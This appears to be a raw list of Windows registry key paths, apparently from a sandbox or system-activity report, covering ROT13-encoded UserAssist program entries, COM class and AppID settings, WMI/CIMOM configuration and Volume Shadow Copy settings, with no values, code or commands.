                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\Hfref\hfre\Qrfxgbc\Zvpebfbsg Rqtr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\JvaENE\JvaENE.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\7-Mvc\7mSZ.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000\ProfileImagePath

                    
                        HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData

                    
                        HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\CreationTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Provider

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Scope

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\Locale

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\User

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\MarshaledProxy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{02A101D1-60F1-43ED-A149-96E77B861279}\ProcessIdentifier

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\CreationTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Provider

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Scope

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\Locale

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\User

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\MarshaledProxy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{53200D82-812C-4C42-A5E0-74CB803F176A}\ProcessIdentifier

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\CreationTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Provider

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Scope

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\Locale

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\User

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\MarshaledProxy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{603BE053-620B-4345-A123-3BA8128C5CDC}\ProcessIdentifier

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\CreationTime

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Provider

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Scope

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\Locale

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\User

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\MarshaledProxy

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{C78C9EA0-13FF-4648-B20C-28E21D5ED90B}\ProcessIdentifier

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled

                    
